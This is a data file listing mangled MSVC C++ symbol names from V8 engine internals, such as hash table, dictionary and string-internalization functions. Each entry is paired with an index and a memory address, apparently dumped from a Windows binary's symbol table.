                                                                                                                                                                                                                                    ??$Allocate@VIsolate@internal@v8@@@AstConsString@internal@v8@@AEBA?AV?$Handle@VString@internal@v8@@@12@PEAVIsolate@12@@Z110x140c6f000
                                                                                                                                                                                                                                    ??$Allocate@VIsolate@internal@v8@@@DescriptorArray@internal@v8@@SA?AV?$Handle@VDescriptorArray@internal@v8@@@12@PEAVIsolate@12@HHW4AllocationType@12@@Z120x1408fd220
                                                                                                                                                                                                                                    ??$Allocate@VIsolate@internal@v8@@@OrderedHashMap@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@@Z130x1408f6580
                                                                                                                                                                                                                                    ??$Allocate@VIsolate@internal@v8@@@OrderedHashSet@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@@Z140x1408f65a0
                                                                                                                                                                                                                                    ??$Allocate@VIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@@Z150x1408f65c0
                                                                                                                                                                                                                                    ??$Allocate@VLocalIsolate@internal@v8@@@AstConsString@internal@v8@@AEBA?AV?$Handle@VString@internal@v8@@@12@PEAVLocalIsolate@12@@Z160x140c6f0b0
                                                                                                                                                                                                                                    ??$Allocate@VLocalIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@@Z170x1408f65f0
                                                                                                                                                                                                                                    ??$AllocateFlat@VIsolate@internal@v8@@@AstConsString@internal@v8@@QEBA?AV?$Handle@VString@internal@v8@@@12@PEAVIsolate@12@@Z180x140c6f160
                                                                                                                                                                                                                                    ??$AllocateFlat@VLocalIsolate@internal@v8@@@AstConsString@internal@v8@@QEBA?AV?$Handle@VString@internal@v8@@@12@PEAVLocalIsolate@12@@Z190x140c6f360
                                                                                                                                                                                                                                    ??$AllocateScopeInfos@VIsolate@internal@v8@@@DeclarationScope@internal@v8@@SAXPEAVParseInfo@12@PEAVIsolate@12@@Z200x140c5fef0
                                                                                                                                                                                                                                    ??$AllocateScopeInfos@VLocalIsolate@internal@v8@@@DeclarationScope@internal@v8@@SAXPEAVParseInfo@12@PEAVLocalIsolate@12@@Z210x140c5ffa0
                                                                                                                                                                                                                                    ??$AllocateScopeInfosRecursively@VIsolate@internal@v8@@@Scope@internal@v8@@AEAAXPEAVIsolate@12@V?$MaybeHandle@VScopeInfo@internal@v8@@@12@@Z220x140c60050
                                                                                                                                                                                                                                    ??$AllocateScopeInfosRecursively@VLocalIsolate@internal@v8@@@Scope@internal@v8@@AEAAXPEAVLocalIsolate@12@V?$MaybeHandle@VScopeInfo@internal@v8@@@12@@Z230x140c600e0
                                                                                                                                                                                                                                    ??$AllocateSlotSet@$00@MemoryChunk@internal@v8@@QEAAPEAVSlotSet@12@XZ240x140abb4c0
                                                                                                                                                                                                                                    ??$AllocateSlotSet@$01@MemoryChunk@internal@v8@@QEAAPEAVSlotSet@12@XZ250x140abb4d0
                                                                                                                                                                                                                                    ??$AllocateSlotSet@$0A@@MemoryChunk@internal@v8@@QEAAPEAVSlotSet@12@XZ260x140abb4e0
                                                                                                                                                                                                                                    ??$At@VIsolate@internal@v8@@@ConstantArrayBuilder@interpreter@internal@v8@@QEBA?AV?$MaybeHandle@VObject@internal@v8@@@23@_KPEAVIsolate@23@@Z270x140a33f70
                                                                                                                                                                                                                                    ??$At@VLocalIsolate@internal@v8@@@ConstantArrayBuilder@interpreter@internal@v8@@QEBA?AV?$MaybeHandle@VObject@internal@v8@@@23@_KPEAVLocalIsolate@23@@Z280x140a34030
                                                                                                                                                                                                                                    ??$BigIntLiteral@VIsolate@internal@v8@@@internal@v8@@YA?AV?$MaybeHandle@VBigInt@internal@v8@@@01@PEAVIsolate@01@PEBD@Z290x140a086f0
                                                                                                                                                                                                                                    ??$BigIntLiteral@VLocalIsolate@internal@v8@@@internal@v8@@YA?AV?$MaybeHandle@VBigInt@internal@v8@@@01@PEAVLocalIsolate@01@PEBD@Z300x140a088a0
                                                                                                                                                                                                                                    ??$BuildValue@VIsolate@internal@v8@@@Literal@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@12@PEAVIsolate@12@@Z310x140c6c5c0
                                                                                                                                                                                                                                    ??$BuildValue@VLocalIsolate@internal@v8@@@Literal@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@12@PEAVLocalIsolate@12@@Z320x140c6c7f0
                                                                                                                                                                                                                                    ??$ConvertDouble@H@internal@v8@@YAHN@Z330x140c73640
                                                                                                                                                                                                                                    ??$ConvertDouble@I@internal@v8@@YAIN@Z340x140c73640
                                                                                                                                                                                                                                    ??$ConvertDouble@M@internal@v8@@YAMN@Z350x140639bc0
                                                                                                                                                                                                                                    ??$ConvertDouble@N@internal@v8@@YANN@Z360x1400971a0
                                                                                                                                                                                                                                    ??$ConvertDouble@_J@internal@v8@@YA_JN@Z370x140c73650
                                                                                                                                                                                                                                    ??$ConvertDouble@_K@internal@v8@@YA_KN@Z380x140c73650
                                                                                                                                                                                                                                    ??$ConvertDouble@_N@internal@v8@@YA_NN@Z390x140c73660
                                                                                                                                                                                                                                    ??$Create@VIsolate@internal@v8@@@ScopeInfo@internal@v8@@SA?AV?$Handle@VScopeInfo@internal@v8@@@12@PEAVIsolate@12@PEAVZone@12@PEAVScope@12@V?$MaybeHandle@VScopeInfo@internal@v8@@@12@@Z400x1408ee600
                                                                                                                                                                                                                                    ??$Create@VLocalIsolate@internal@v8@@@ScopeInfo@internal@v8@@SA?AV?$Handle@VScopeInfo@internal@v8@@@12@PEAVLocalIsolate@12@PEAVZone@12@PEAVScope@12@V?$MaybeHandle@VScopeInfo@internal@v8@@@12@@Z410x1408ef0f0
                                                                                                                                                                                                                                    ??$CreateScript@VIsolate@internal@v8@@@ParseInfo@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@12@PEAVIsolate@12@V?$Handle@VString@internal@v8@@@12@V?$MaybeHandle@VFixedArray@internal@v8@@@12@VScriptOriginOptions@2@W4NativesFlag@12@@Z420x1408c7fe0
                                                                                                                                                                                                                                    ??$CreateScript@VLocalIsolate@internal@v8@@@ParseInfo@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@12@PEAVLocalIsolate@12@V?$Handle@VString@internal@v8@@@12@V?$MaybeHandle@VFixedArray@internal@v8@@@12@VScriptOriginOptions@2@W4NativesFlag@12@@Z430x1408c8190
                                                                                                                                                                                                                                    ??$Decode@E@Utf8Decoder@internal@v8@@QEAAXPEAEAEBV?$Vector@$$CBE@base@2@@Z440x1407cc710
                                                                                                                                                                                                                                    ??$Decode@G@Utf8Decoder@internal@v8@@QEAAXPEAGAEBV?$Vector@$$CBE@base@2@@Z450x1407cc850
                                                                                                                                                                                                                                    ??$DeserializeScopeChain@VIsolate@internal@v8@@@Scope@internal@v8@@SAPEAV012@PEAVIsolate@12@PEAVZone@12@VScopeInfo@12@PEAVDeclarationScope@12@PEAVAstValueFactory@12@W4DeserializationMode@012@@Z460x140c60170
                                                                                                                                                                                                                                    ??$DeserializeScopeChain@VLocalIsolate@internal@v8@@@Scope@internal@v8@@SAPEAV012@PEAVLocalIsolate@12@PEAVZone@12@VScopeInfo@12@PEAVDeclarationScope@12@PEAVAstValueFactory@12@W4DeserializationMode@012@@Z470x140c60960
                                                                                                                                                                                                                                    ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VCompilationCacheTable@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z480x1408fe840
                                                                                                                                                                                                                                    ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VEphemeronHashTable@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z490x1408fe9a0
                                                                                                                                                                                                                                    ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z500x1408feb00
                                                                                                                                                                                                                                    ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z510x1408fec60
                                                                                                                                                                                                                                    ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@SA?AV?$Handle@VNameToIndexHashTable@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z520x1408fedc0
                                                                                                                                                                                                                                    ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z530x1408fef20
                                                                                                                                                                                                                                    ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z540x1408ff080
                                                                                                                                                                                                                                    ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashTable@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z550x1408ff1e0
                                                                                                                                                                                                                                    ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@SA?AV?$Handle@VRegisteredSymbolTable@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z560x1408ff340
                                                                                                                                                                                                                                    ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z570x1408ff4a0
                                                                                                                                                                                                                                    ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z580x1408ff600
                                                                                                                                                                                                                                    ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VCompilationCacheTable@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z590x1408ff760
                                                                                                                                                                                                                                    ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VEphemeronHashTable@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z600x1408ff8c0
                                                                                                                                                                                                                                    ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z610x1408ffa20
                                                                                                                                                                                                                                    ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z620x1408ffb80
                                                                                                                                                                                                                                    ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@SA?AV?$Handle@VNameToIndexHashTable@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z630x1408ffce0
                                                                                                                                                                                                                                    ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z640x1408ffe40
                                                                                                                                                                                                                                    ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z650x1408fffa0
                                                                                                                                                                                                                                    ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashTable@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z660x140900100
                                                                                                                                                                                                                                    ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@SA?AV?$Handle@VRegisteredSymbolTable@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z670x140900260
                                                                                                                                                                                                                                    ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z680x1409003c0
                                                                                                                                                                                                                                    ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z690x140900520
                                                                                                                                                                                                                                    ??$EnsureGrowable@VIsolate@internal@v8@@@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@12@PEAVIsolate@12@V?$Handle@VOrderedHashMap@internal@v8@@@12@@Z700x1408f6700
                                                                                                                                                                                                                                    ??$EnsureGrowable@VIsolate@internal@v8@@@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@12@PEAVIsolate@12@V?$Handle@VOrderedHashSet@internal@v8@@@12@@Z710x1408f6770
                                                                                                                                                                                                                                    ??$FindEntry@VIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@QEAA?AVInternalIndex@12@PEAVIsolate@12@VObject@12@@Z720x1408f67e0
                                                                                                                                                                                                                                    ??$FindEntry@VLocalIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@QEAA?AVInternalIndex@12@PEAVLocalIsolate@12@VObject@12@@Z730x1408f67e0
                                                                                                                                                                                                                                    ??$GetBoilerplateValue@VIsolate@internal@v8@@@LiteralBoilerplateBuilder@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@12@PEAVExpression@12@PEAVIsolate@12@@Z740x140c6ca90
                                                                                                                                                                                                                                    ??$GetBoilerplateValue@VLocalIsolate@internal@v8@@@LiteralBoilerplateBuilder@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@12@PEAVExpression@12@PEAVLocalIsolate@12@@Z750x140c6cb40
                                                                                                                                                                                                                                    ??$GetConstantForIndexOperand@VIsolate@internal@v8@@@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@23@HPEAVIsolate@23@@Z760x140a53170
                                                                                                                                                                                                                                    ??$InitFromFunctionLiteral@VIsolate@internal@v8@@@SharedFunctionInfo@internal@v8@@SAXPEAVIsolate@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@PEAVFunctionLiteral@12@_N@Z770x1408eb230
                                                                                                                                                                                                                                    ??$InitFromFunctionLiteral@VLocalIsolate@internal@v8@@@SharedFunctionInfo@internal@v8@@SAXPEAVLocalIsolate@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@PEAVFunctionLiteral@12@_N@Z780x1408eb6c0
                                                                                                                                                                                                                                    ??$InitLineEnds@VIsolate@internal@v8@@@Script@internal@v8@@SAXPEAVIsolate@12@V?$Handle@VScript@internal@v8@@@12@@Z790x140900ab0
                                                                                                                                                                                                                                    ??$InitLineEnds@VLocalIsolate@internal@v8@@@Script@internal@v8@@SAXPEAVLocalIsolate@12@V?$Handle@VScript@internal@v8@@@12@@Z800x140900bd0
                                                                                                                                                                                                                                    ??$Initialize@VIsolate@internal@v8@@@SwissNameDictionary@internal@v8@@QEAAXPEAVIsolate@12@VByteArray@12@H@Z810x1408d79f0
                                                                                                                                                                                                                                    ??$Initialize@VLocalIsolate@internal@v8@@@SwissNameDictionary@internal@v8@@QEAAXPEAVLocalIsolate@12@VByteArray@12@H@Z820x1408d7b40
                                                                                                                                                                                                                                    ??$Internalize@VIsolate@internal@v8@@@AstRawString@internal@v8@@QEAAXPEAVIsolate@12@@Z830x140c6f560
                                                                                                                                                                                                                                    ??$Internalize@VIsolate@internal@v8@@@AstValueFactory@internal@v8@@QEAAXPEAVIsolate@12@@Z840x140c6f620
                                                                                                                                                                                                                                    ??$Internalize@VLocalIsolate@internal@v8@@@AstRawString@internal@v8@@QEAAXPEAVLocalIsolate@12@@Z850x140c6f750
                                                                                                                                                                                                                                    ??$Internalize@VLocalIsolate@internal@v8@@@AstValueFactory@internal@v8@@QEAAXPEAVLocalIsolate@12@@Z860x140c6f810
                                                                                                                                                                                                                                    ??$InternalizeStringWithKey@V?$SeqSubStringKey@VSeqOneByteString@internal@v8@@@internal@v8@@@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SeqSubStringKey@VSeqOneByteString@internal@v8@@@12@@Z870x140b338a0
                                                                                                                                                                                                                                    ??$InternalizeStringWithKey@V?$SeqSubStringKey@VSeqTwoByteString@internal@v8@@@internal@v8@@@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SeqSubStringKey@VSeqTwoByteString@internal@v8@@@12@@Z880x140b338d0
                                                                                                                                                                                                                                    ??$InternalizeStringWithKey@V?$SequentialStringKey@E@internal@v8@@@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SequentialStringKey@E@12@@Z890x140b33900
                                                                                                                                                                                                                                    ??$InternalizeStringWithKey@V?$SequentialStringKey@E@internal@v8@@@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SequentialStringKey@E@12@@Z900x140b33930
                                                                                                                                                                                                                                    ??$InternalizeStringWithKey@V?$SequentialStringKey@G@internal@v8@@@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SequentialStringKey@G@12@@Z910x140b33960
                                                                                                                                                                                                                                    ??$InternalizeStringWithKey@V?$SequentialStringKey@G@internal@v8@@@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SequentialStringKey@G@12@@Z920x140b33990
                                                                                                                                                                                                                                    ??$MakeCheckOpString@HH@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@HHPEBD@Z930x140feebc0
                                                                                                                                                                                                                                    ??$MakeCheckOpString@II@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IIPEBD@Z940x140feeea0
                                                                                                                                                                                                                                    ??$MakeCheckOpString@JJ@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@JJPEBD@Z950x140fef180
                                                                                                                                                                                                                                    ??$MakeCheckOpString@KK@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@KKPEBD@Z960x140fef460
                                                                                                                                                                                                                                    ??$MakeCheckOpString@PEBXPEBX@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBX0PEBD@Z970x140fef740
                                                                                                                                                                                                                                    ??$MakeCheckOpString@_J_J@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_J0PEBD@Z980x140fefa20
                                                                                                                                                                                                                                    ??$MakeCheckOpString@_K_K@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_K0PEBD@Z990x140fefd10
                                                                                                                                                                                                                                    ??$MakeThin@VIsolate@internal@v8@@@String@internal@v8@@QEAAXPEAVIsolate@12@V012@@Z1000x1408da760
                                                                                                                                                                                                                                    ??$MakeThin@VLocalIsolate@internal@v8@@@String@internal@v8@@QEAAXPEAVLocalIsolate@12@V012@@Z1010x1408da870
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1020x140900da0
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1030x140900df0
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VCompilationCacheTable@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1040x140900e40
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VEphemeronHashTable@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1050x140900f00
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1060x140900fc0
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1070x140901080
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@SA?AV?$Handle@VNameToIndexHashTable@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1080x140901140
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1090x140901200
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1100x1409012c0
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashTable@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1110x140901380
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@SA?AV?$Handle@VRegisteredSymbolTable@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1120x140901440
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1130x140901500
                                                                                                                                                                                                                                    ??$New@VIsolate@internal@v8@@@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1140x1409012c0
                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1150x1409015c0
                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1160x140901610
                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VCompilationCacheTable@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1170x140901660
                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VEphemeronHashTable@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1180x140901720
                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1190x1409017e0
                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1200x1409018a0
                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@SA?AV?$Handle@VNameToIndexHashTable@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1210x140901970
                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1220x140901a30
                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1230x140901af0
                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashTable@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1240x140901bb0
                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@SA?AV?$Handle@VRegisteredSymbolTable@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1250x140901c70
                                                                                                                                                                                                                                    ??$New@VLocalIsolate@internal@v8@@@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1260x140901d30
